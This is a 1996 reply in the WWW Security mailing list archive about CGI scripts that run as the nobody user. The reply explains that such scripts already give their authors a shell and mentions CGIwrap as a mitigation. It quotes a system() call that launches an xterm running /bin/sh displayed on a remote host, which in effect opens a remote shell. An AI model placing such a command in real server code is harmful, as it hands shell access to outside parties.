[3676] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Paul Phillips)
Wed Dec 4 03:39:50 1996
Date: Tue, 3 Dec 1996 21:26:49 -0800 (PST)
From: Paul Phillips <psp@well.com>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu
On Tue, 3 Dec 1996, Andrea Di Fabio wrote:
> I was experimenting with cgi scripts when I came up with this idea:
>
> What if I have a cgi script which does the followin:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
What if you have a CGI script which does... anything?
If you can write CGI's to be executed by the server as nobody, you don't
need an xtrem to get a shell. You've already got a shell. That's what
you used to execute the system command.
There's no way to protect yourself from this if arbitrary users are
allowed to place arbitrary scripts to be run by the webserver UID. You
can use CGIwrap to have them run as the script owner instead of nobody,
if you're afraid of what they might do with such power; but if the
presumption is that they already have user accounts, there's not a whole
lot more they can do.
--
Paul Phillips <psp@well.com>
